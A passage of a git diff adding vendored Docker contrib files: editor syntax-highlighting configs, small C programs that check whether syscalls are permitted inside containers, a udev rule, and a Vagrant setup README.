zRO!UzMJEH81Jn5l%X!>(n*uUl@{rz-3Z5RXd1H00sjUle)ye1-ZW8H-mPzWaX2Z92
z2)V}{CiL_>nKMVNq%`CEQ5d3}lA>0PK!ac7>?t`f8d{Df`Sy8gn~~aa>{ftd?6kTc
zF|j|25>LYg?~WqBj^i1)>7ay0aXYDvzLZeVoOJ<)sByEh<EI<l@x1e(_Bp3ByxrO`
z$vE_#oe}6Ly22=|X!w6?Lv+5|#&e)SRobG_d#+5Zp@LY;rx^2OQ%}fkPH~&&I&^Zk
zWg5Gtxm!0+Gp71sXz8R%J5}r=9Ii1YJ9aLGzb&fSCSE+``gXpW{;{gZF@D0LN!8lg
z)DBk<dooO<czYOV_19S7+4cc%SzpUlgU#OQpr!2{4QAgr8mup~e|kV@|9}^!|NT1q
zee!uazn+qt+1>Pdb$d6PF5P+?nTA#c=PA@scfsdyQ}Y5_8NS&t1%dCZ80_lCjU~9q
zjg5~^n4io*sRMU<sF-A#rBD<+SaaDOeFqAgqH2x3Dt60>j<t<BPK3jpGK}CsRssdL
zabW}Tw5J&p3BE@t3b1Vh0F-R5fC!s&uW~~Vt@gNky}5%Ox{P+=<1xGs7O%i<f}Mtx
z3{S0tyNnxoAM*jTpn#7I@5pf9rfGO}xth#xCU-ZjBNd%Y+^aLv_E>w&e-&PXRHliX
zY20}XrJnZnS;I@=y@9J_Lt)mmQkSDND_Fue2MBz)TLn7JCJNW?r(tTxn%2Mxv7ZB5
zT8-6m%Jsu2I&X4wlF-Qy)}Z;JzP3%3&VP8`3&%{68=F@ZwA>hn8)wGbGNbs`rvO<x
zv;o@d?KQ9y;hdVJanO9`h(<HAI#XSrAMd+%zy-*0U1GZce8*>w+<HuDH)(~0&1-nL
zs&LYnZo)j-@<E4dlPDgfD=<O{NzEsew0W?gHfm&rPRQ=HRX<=ycMdKUnp;Hn8o_|H
zO}R_a$M3hgf%qD&7l@<l2I3BqH<e@OuFZ4F9(nr=;tRlD9FFd#{zESBwo`Y7inE4z
z2I2NHfEUD<O~p-k+uoq^g>Ii6L#f+~(-Xebl9tVa4Q=RZL4J-Fm?7Us&zIL%<a}v;
zy4F!vUqWO{>JG!WlDgL{mh6HshYGQfieib=4EQndS1#f<%XMS1_3R~RknrMThpB*A
zCYMWHDccRA1lxy7yBA1<_@xnpti)d@-AL;Gr58s<`kYA`A6_^qr^Q>}F{(R=iy*ms
z_mz-vzy~*6=s#M}x=+}dR_%&(wP_tsZHrdF6ek~>)suhy9Ri#~Hp*p+-+449V#y8*
z2Vd{B>(20^n+gC1%*l?5Ejz8!n$?sqc{{6|sNQ9TW$Yu)$1I|Q6&gyDs=UJFgs-`Q
z0ehv#<~$8HY8O8d4mOJ-J2c8J|4Myuef#ALRG`bj8C+l}nrYeoSfF~{9fp7{rG2HY
zM<;c3{cS*>;P9>+Vg|o4pzX0HSg7$y!pS!7-9zUVZUj6|-4GUXvo>%SjTOt~zIt=-
z-(4J4q<(_iha62Dz7?pde3zq!?w%O>PqiXYgOcCA&On092;Ebjh1w>3&(N6b`qqva
z<BV(lH~G5ybbA-spaBqYu|gpaU>_kj(bC9a^$msVm=VkX>UOUv6-Ye@!LXc8$>j6$
xb`W`pZ+>}u<<GSJXE28SQ3sg)X^+dBcb3Y@hsV)XJ=4aY{|A)3lDQ5i005DdZwCMX

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/contrib/syntax/nano/Dockerfile.nanorc b/vendor/github.com/docker/docker/contrib/syntax/nano/Dockerfile.nanorc
new file mode 100644
index 0000000000..8b63dae945
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/nano/Dockerfile.nanorc
@@ -0,0 +1,26 @@
+## Syntax highlighting for Dockerfiles
+syntax "Dockerfile" "Dockerfile[^/]*$"
+
+## Keywords
+icolor red "^(ONBUILD\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)[[:space:]]"
+
+## Brackets & parenthesis
+color brightgreen "(\(|\)|\[|\])"
+
+## Double ampersand
+color brightmagenta "&&"
+
+## Comments
+icolor cyan "^[[:space:]]*#.*$"
+
+## Blank space at EOL
+color ,green "[[:space:]]+$"
+
+## Strings, single-quoted
+color brightwhite "'([^']|(\\'))*'" "%[qw]\{[^}]*\}" "%[qw]\([^)]*\)" "%[qw]<[^>]*>" "%[qw]\[[^]]*\]" "%[qw]\$[^$]*\$" "%[qw]\^[^^]*\^" "%[qw]![^!]*!"
+
+## Strings, double-quoted
+color brightwhite ""([^"]|(\\"))*"" "%[QW]?\{[^}]*\}" "%[QW]?\([^)]*\)" "%[QW]?<[^>]*>" "%[QW]?\[[^]]*\]" "%[QW]?\$[^$]*\$" "%[QW]?\^[^^]*\^" "%[QW]?![^!]*!"
+
+## Single and double quotes
+color brightyellow "('|\")"
diff --git a/vendor/github.com/docker/docker/contrib/syntax/nano/README.md b/vendor/github.com/docker/docker/contrib/syntax/nano/README.md
new file mode 100644
index 0000000000..5985208b09
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/nano/README.md
@@ -0,0 +1,32 @@
+Dockerfile.nanorc
+=================
+
+Dockerfile syntax highlighting for nano
+
+Single User Installation
+------------------------
+1. Create a nano syntax directory in your home directory:
+ * `mkdir -p ~/.nano/syntax`
+
+2. Copy `Dockerfile.nanorc` to` ~/.nano/syntax/`
+ * `cp Dockerfile.nanorc ~/.nano/syntax/`
+
+3. Add the following to your `~/.nanorc` to tell nano where to find the `Dockerfile.nanorc` file
+  ```
+## Dockerfile files
+include "~/.nano/syntax/Dockerfile.nanorc"
+  ```
+
+System Wide Installation
+------------------------
+1. Create a nano syntax directory: 
+  * `mkdir /usr/local/share/nano`
+
+2. Copy `Dockerfile.nanorc` to `/usr/local/share/nano`
+  * `cp Dockerfile.nanorc /usr/local/share/nano/`
+
+3. Add the following to your `/etc/nanorc`:
+  ```
+## Dockerfile files
+include "/usr/local/share/nano/Dockerfile.nanorc"
+  ```
diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences
new file mode 100644
index 0000000000..20f0d04ca8
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>name</key>
+	<string>Comments</string>
+	<key>scope</key>
+	<string>source.dockerfile</string>
+	<key>settings</key>
+	<dict>
+		<key>shellVariables</key>
+		<array>
+			<dict>
+				<key>name</key>
+				<string>TM_COMMENT_START</string>
+				<key>value</key>
+				<string># </string>
+			</dict>
+		</array>
+	</dict>
+	<key>uuid</key>
+	<string>2B215AC0-A7F3-4090-9FF6-F4842BD56CA7</string>
+</dict>
+</plist>
diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage
new file mode 100644
index 0000000000..948a9bfc20
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage
@@ -0,0 +1,143 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>fileTypes</key>
+	<array>
+		<string>Dockerfile</string>
+	</array>
+	<key>name</key>
+	<string>Dockerfile</string>
+	<key>patterns</key>
+	<array>
+		<dict>
+			<key>captures</key>
+			<dict>
+				<key>1</key>
+				<dict>
+					<key>name</key>
+					<string>keyword.control.dockerfile</string>
+				</dict>
+				<key>2</key>
+				<dict>
+					<key>name</key>
+					<string>keyword.other.special-method.dockerfile</string>
+				</dict>
+			</dict>
+			<key>match</key>
+			<string>^\s*(?:(ONBUILD)\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s</string>
+		</dict>
+		<dict>
+			<key>captures</key>
+			<dict>
+				<key>1</key>
+				<dict>
+					<key>name</key>
+					<string>keyword.operator.dockerfile</string>
+				</dict>
+				<key>2</key>
+				<dict>
+					<key>name</key>
+					<string>keyword.other.special-method.dockerfile</string>
+				</dict>
+			</dict>
+			<key>match</key>
+			<string>^\s*(?:(ONBUILD)\s+)?(CMD|ENTRYPOINT)\s</string>
+		</dict>
+		<dict>
+			<key>begin</key>
+			<string>"</string>
+			<key>beginCaptures</key>
+			<dict>
+				<key>1</key>
+				<dict>
+					<key>name</key>
+					<string>punctuation.definition.string.begin.dockerfile</string>
+				</dict>
+			</dict>
+			<key>end</key>
+			<string>"</string>
+			<key>endCaptures</key>
+			<dict>
+				<key>1</key>
+				<dict>
+					<key>name</key>
+					<string>punctuation.definition.string.end.dockerfile</string>
+				</dict>
+			</dict>
+			<key>name</key>
+			<string>string.quoted.double.dockerfile</string>
+			<key>patterns</key>
+			<array>
+				<dict>
+					<key>match</key>
+					<string>\\.</string>
+					<key>name</key>
+					<string>constant.character.escaped.dockerfile</string>
+				</dict>
+			</array>
+		</dict>
+		<dict>
+			<key>begin</key>
+			<string>'</string>
+			<key>beginCaptures</key>
+			<dict>
+				<key>1</key>
+				<dict>
+					<key>name</key>
+					<string>punctuation.definition.string.begin.dockerfile</string>
+				</dict>
+			</dict>
+			<key>end</key>
+			<string>'</string>
+			<key>endCaptures</key>
+			<dict>
+				<key>1</key>
+				<dict>
+					<key>name</key>
+					<string>punctuation.definition.string.end.dockerfile</string>
+				</dict>
+			</dict>
+			<key>name</key>
+			<string>string.quoted.single.dockerfile</string>
+			<key>patterns</key>
+			<array>
+				<dict>
+					<key>match</key>
+					<string>\\.</string>
+					<key>name</key>
+					<string>constant.character.escaped.dockerfile</string>
+				</dict>
+			</array>
+		</dict>
+		<dict>
+			<key>captures</key>
+			<dict>
+				<key>1</key>
+				<dict>
+					<key>name</key>
+					<string>punctuation.whitespace.comment.leading.dockerfile</string>
+				</dict>
+				<key>2</key>
+				<dict>
+					<key>name</key>
+					<string>comment.line.number-sign.dockerfile</string>
+				</dict>
+				<key>3</key>
+				<dict>
+					<key>name</key>
+					<string>punctuation.definition.comment.dockerfile</string>
+				</dict>
+			</dict>
+			<key>comment</key>
+			<string>comment.line</string>
+			<key>match</key>
+			<string>^(\s*)((#).*$\n?)</string>
+		</dict>
+	</array>
+	<key>scopeName</key>
+	<string>source.dockerfile</string>
+	<key>uuid</key>
+	<string>a39d8795-59d2-49af-aa00-fe74ee29576e</string>
+</dict>
+</plist>
diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist
new file mode 100644
index 0000000000..239f4b0a9b
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>contactEmailRot13</key>
+	<string>germ@andz.com.ar</string>
+	<key>contactName</key>
+	<string>GermanDZ</string>
+	<key>description</key>
+	<string>Helpers for Docker.</string>
+	<key>name</key>
+	<string>Docker</string>
+	<key>uuid</key>
+	<string>8B9DDBAF-E65C-4E12-FFA7-467D4AA535B1</string>
+</dict>
+</plist>
diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md b/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md
new file mode 100644
index 0000000000..ce611018e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/README.md
@@ -0,0 +1,17 @@
+# Docker.tmbundle
+
+Dockerfile syntax highlighting for TextMate and Sublime Text.
+
+## Install
+
+### Sublime Text
+
+Available for Sublime Text under [package control](https://sublime.wbond.net/packages/Dockerfile%20Syntax%20Highlighting).
+Search for *Dockerfile Syntax Highlighting*
+
+### TextMate 2
+
+You can install this bundle in TextMate by opening the preferences and going to the bundles tab. After installation it will be automatically updated for you.
+
+enjoy.
+
diff --git a/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS b/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS
new file mode 100644
index 0000000000..965743df64
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS
@@ -0,0 +1 @@
+Asbjorn Enge <asbjorn@hanafjedle.net> (@asbjornenge)
diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE b/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE
new file mode 100644
index 0000000000..e67cdabd22
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE
@@ -0,0 +1,22 @@
+Copyright (c) 2013 Honza Pokorny
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright
+   notice, this list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in the
+   documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/README.md b/vendor/github.com/docker/docker/contrib/syntax/vim/README.md
new file mode 100644
index 0000000000..5aa9bd825d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/vim/README.md
@@ -0,0 +1,26 @@
+dockerfile.vim
+==============
+
+Syntax highlighting for Dockerfiles
+
+Installation
+------------
+With [pathogen](https://github.com/tpope/vim-pathogen), the usual way...
+
+With [Vundle](https://github.com/gmarik/Vundle.vim)
+  
+    Plugin 'docker/docker' , {'rtp': '/contrib/syntax/vim/'}
+
+Features
+--------
+
+The syntax highlighting includes:
+
+* The directives (e.g. `FROM`)
+* Strings
+* Comments
+
+License
+-------
+
+BSD, short and sweet
diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt b/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt
new file mode 100644
index 0000000000..e69e2b7b30
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt
@@ -0,0 +1,18 @@
+*dockerfile.txt*  Syntax highlighting for Dockerfiles
+
+Author: Honza Pokorny <https://honza.ca>
+License: BSD
+
+INSTALLATION                                                     *installation*
+
+Drop it on your Pathogen path and you're all set.
+
+FEATURES                                                             *features*
+
+The syntax highlighting includes:
+
+* The directives (e.g. FROM)
+* Strings
+* Comments
+
+ vim:tw=78:et:ft=help:norl:
diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim
new file mode 100644
index 0000000000..ee10e5d6a0
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim
@@ -0,0 +1 @@
+au BufNewFile,BufRead [Dd]ockerfile,Dockerfile.* set filetype=dockerfile
diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim
new file mode 100644
index 0000000000..a067e6ad4c
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim
@@ -0,0 +1,31 @@
+" dockerfile.vim - Syntax highlighting for Dockerfiles
+" Maintainer:   Honza Pokorny <https://honza.ca>
+" Version:      0.5
+
+
+if exists("b:current_syntax")
+    finish
+endif
+
+let b:current_syntax = "dockerfile"
+
+syntax case ignore
+
+syntax match dockerfileKeyword /\v^\s*(ONBUILD\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s/
+highlight link dockerfileKeyword Keyword
+
+syntax region dockerfileString start=/\v"/ skip=/\v\\./ end=/\v"/
+highlight link dockerfileString String
+
+syntax match dockerfileComment "\v^\s*#.*$"
+highlight link dockerfileComment Comment
+
+set commentstring=#\ %s
+
+" match "RUN", "CMD", and "ENTRYPOINT" lines, and parse them as shell
+let s:current_syntax = b:current_syntax
+unlet b:current_syntax
+syntax include @SH syntax/sh.vim
+let b:current_syntax = s:current_syntax
+syntax region shLine matchgroup=dockerfileKeyword start=/\v^\s*(RUN|CMD|ENTRYPOINT)\s/ end=/\v$/ contains=@SH
+" since @SH will handle "\" as part of the same line automatically, this "just works" for line continuation too, but with the caveat that it will highlight "RUN echo '" followed by a newline as if it were a block because the "'" is shell line continuation...  not sure how to fix that just yet (TODO)
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile b/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile
new file mode 100644
index 0000000000..f95f1758c0
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile
@@ -0,0 +1,15 @@
+FROM buildpack-deps:jessie
+
+COPY . /usr/src/
+
+WORKDIR /usr/src/
+
+RUN gcc -g -Wall -static userns.c -o /usr/bin/userns-test \
+	&& gcc -g -Wall -static ns.c -o /usr/bin/ns-test \
+	&& gcc -g -Wall -static acct.c -o /usr/bin/acct-test \
+	&& gcc -g -Wall -static setuid.c -o /usr/bin/setuid-test \
+	&& gcc -g -Wall -static setgid.c -o /usr/bin/setgid-test \
+	&& gcc -g -Wall -static socket.c -o /usr/bin/socket-test \
+	&& gcc -g -Wall -static raw.c -o /usr/bin/raw-test
+
+RUN [ "$(uname -m)" = "x86_64" ] && gcc -s -m32 -nostdlib exit32.s -o /usr/bin/exit32-test || true
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/acct.c b/vendor/github.com/docker/docker/contrib/syscall-test/acct.c
new file mode 100644
index 0000000000..88ac287966
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/acct.c
@@ -0,0 +1,16 @@
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+
+int main(int argc, char **argv)
+{
+	int err = acct("/tmp/t");
+	if (err == -1) {
+		fprintf(stderr, "acct failed: %s\n", strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+	exit(EXIT_SUCCESS);
+}
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s b/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s
new file mode 100644
index 0000000000..8bbb5c58b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/exit32.s
@@ -0,0 +1,7 @@
+.globl _start
+.text
+_start:
+	xorl	%eax, %eax
+	incl	%eax
+	movb	$0, %bl
+	int	$0x80
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c
new file mode 100644
index 0000000000..33684e1c3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c
@@ -0,0 +1,63 @@
+#define _GNU_SOURCE
+#include <errno.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define STACK_SIZE (1024 * 1024)	/* Stack size for cloned child */
+
+struct clone_args {
+	char **argv;
+};
+
+// child_exec is the func that will be executed as the result of clone
+static int child_exec(void *stuff)
+{
+	struct clone_args *args = (struct clone_args *)stuff;
+	if (execvp(args->argv[0], args->argv) != 0) {
+		fprintf(stderr, "failed to execvp argments %s\n",
+			strerror(errno));
+		exit(-1);
+	}
+	// we should never reach here!
+	exit(EXIT_FAILURE);
+}
+
+int main(int argc, char **argv)
+{
+	struct clone_args args;
+	args.argv = &argv[1];
+
+	int clone_flags = CLONE_NEWNS | CLONE_NEWPID | SIGCHLD;
+
+	// allocate stack for child
+	char *stack;		/* Start of stack buffer */
+	char *child_stack;	/* End of stack buffer */
+	stack =
+	    mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
+		 MAP_SHARED | MAP_ANON | MAP_STACK, -1, 0);
+	if (stack == MAP_FAILED) {
+		fprintf(stderr, "mmap failed: %s\n", strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+	child_stack = stack + STACK_SIZE;	/* Assume stack grows downward */
+
+	// the result of this call is that our child_exec will be run in another
+	// process returning its pid
+	pid_t pid = clone(child_exec, child_stack, clone_flags, &args);
+	if (pid < 0) {
+		fprintf(stderr, "clone failed: %s\n", strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+	// lets wait on our child process here before we, the parent, exits
+	if (waitpid(pid, NULL, 0) == -1) {
+		fprintf(stderr, "failed to wait pid %d\n", pid);
+		exit(EXIT_FAILURE);
+	}
+	exit(EXIT_SUCCESS);
+}
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/raw.c b/vendor/github.com/docker/docker/contrib/syscall-test/raw.c
new file mode 100644
index 0000000000..7995a0d3a5
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/raw.c
@@ -0,0 +1,14 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+
+int main() {
+	if (socket(PF_INET, SOCK_RAW, IPPROTO_UDP) == -1) {
+		perror("socket");
+		return 1;
+	}
+
+	return 0;
+}
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c b/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c
new file mode 100644
index 0000000000..df9680c869
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/setgid.c
@@ -0,0 +1,11 @@
+#include <sys/types.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main() {
+	if (setgid(1) == -1) {
+		perror("setgid");
+		return 1;
+	}
+	return 0;
+}
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c b/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c
new file mode 100644
index 0000000000..5b939677e9
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/setuid.c
@@ -0,0 +1,11 @@
+#include <sys/types.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main() {
+	if (setuid(1) == -1) {
+		perror("setuid");
+		return 1;
+	}
+	return 0;
+}
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/socket.c b/vendor/github.com/docker/docker/contrib/syscall-test/socket.c
new file mode 100644
index 0000000000..d26c82f00f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/socket.c
@@ -0,0 +1,30 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+int main() {
+	int s;
+	struct sockaddr_in sin;
+
+	s = socket(AF_INET, SOCK_STREAM, 0);
+	if (s == -1) {
+		perror("socket");
+		return 1;
+	}
+
+	sin.sin_family = AF_INET;
+	sin.sin_addr.s_addr = INADDR_ANY;
+	sin.sin_port = htons(80);
+
+	if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
+		perror("bind");
+		return 1;
+	}
+
+	close(s);
+
+	return 0;
+}
diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c
new file mode 100644
index 0000000000..2af36f4228
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c
@@ -0,0 +1,63 @@
+#define _GNU_SOURCE
+#include <errno.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define STACK_SIZE (1024 * 1024)	/* Stack size for cloned child */
+
+struct clone_args {
+	char **argv;
+};
+
+// child_exec is the func that will be executed as the result of clone
+static int child_exec(void *stuff)
+{
+	struct clone_args *args = (struct clone_args *)stuff;
+	if (execvp(args->argv[0], args->argv) != 0) {
+		fprintf(stderr, "failed to execvp argments %s\n",
+			strerror(errno));
+		exit(-1);
+	}
+	// we should never reach here!
+	exit(EXIT_FAILURE);
+}
+
+int main(int argc, char **argv)
+{
+	struct clone_args args;
+	args.argv = &argv[1];
+
+	int clone_flags = CLONE_NEWUSER | SIGCHLD;
+
+	// allocate stack for child
+	char *stack;		/* Start of stack buffer */
+	char *child_stack;	/* End of stack buffer */
+	stack =
+	    mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
+		 MAP_SHARED | MAP_ANON | MAP_STACK, -1, 0);
+	if (stack == MAP_FAILED) {
+		fprintf(stderr, "mmap failed: %s\n", strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+	child_stack = stack + STACK_SIZE;	/* Assume stack grows downward */
+
+	// the result of this call is that our child_exec will be run in another
+	// process returning its pid
+	pid_t pid = clone(child_exec, child_stack, clone_flags, &args);
+	if (pid < 0) {
+		fprintf(stderr, "clone failed: %s\n", strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+	// lets wait on our child process here before we, the parent, exits
+	if (waitpid(pid, NULL, 0) == -1) {
+		fprintf(stderr, "failed to wait pid %d\n", pid);
+		exit(EXIT_FAILURE);
+	}
+	exit(EXIT_SUCCESS);
+}
diff --git a/vendor/github.com/docker/docker/contrib/udev/80-docker.rules b/vendor/github.com/docker/docker/contrib/udev/80-docker.rules
new file mode 100644
index 0000000000..f934c01757
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/udev/80-docker.rules
@@ -0,0 +1,3 @@
+# hide docker's loopback devices from udisks, and thus from user desktops
+SUBSYSTEM=="block", ENV{DM_NAME}=="docker-*", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_IGNORE}="1"
+SUBSYSTEM=="block", DEVPATH=="/devices/virtual/block/loop*", ATTR{loop/backing_file}=="/var/lib/docker/*", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_IGNORE}="1"
diff --git a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md
new file mode 100644
index 0000000000..286a98504a
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md
@@ -0,0 +1,50 @@
+# Vagrant integration
+
+Currently there are at least 4 different projects that we are aware of that deals
+with integration with [Vagrant](http://vagrantup.com/) at different levels. One
+approach is to use Docker as a [provisioner](http://docs.vagrantup.com/v2/provisioning/index.html)
+which means you can create containers and pull base images on VMs using Docker's
+CLI and the other is to use Docker as a [provider](http://docs.vagrantup.com/v2/providers/index.html),
+meaning you can use Vagrant to control Docker containers.
+
+
+### Provisioners
+
+* [Vocker](https://github.com/fgrehm/vocker)
+* [Ventriloquist](https://github.com/fgrehm/ventriloquist)
+
+### Providers
+
+* [docker-provider](https://github.com/fgrehm/docker-provider)
+* [vagrant-shell](https://github.com/destructuring/vagrant-shell)
+
+## Setting up Vagrant-docker with the Engine API
+
+The initial Docker upstart script will not work because it runs on `127.0.0.1`, which is not accessible to the host machine. Instead, we need to change the script to connect to `0.0.0.0`. To do this, modify `/etc/init/docker.conf` to look like this:
+
+```
+description     "Docker daemon"
+
+start on filesystem
+stop on runlevel [!2345]
+
+respawn
+
+script
+    /usr/bin/docker daemon -H=tcp://0.0.0.0:2375
+end script
+```
+
+Once that's done, you need to set up a SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal:
+
+```
+ssh -L 2375:localhost:2375 -p 2222 vagrant@localhost
+```
+
+(The first 2375 is what your host can connect to, the second 2375 is what port Docker is running on in the vagrant machine, and the 2222 is the port Vagrant is providing for SSH. If VirtualBox is the VM you're using, you can see what value "2222" should be by going to: Network > Adapter 1 > Advanced > Port Forwarding in the VirtualBox GUI.)
+
+Note that because the port has been changed, to run docker commands from within the command line you must run them like this:
+
+```
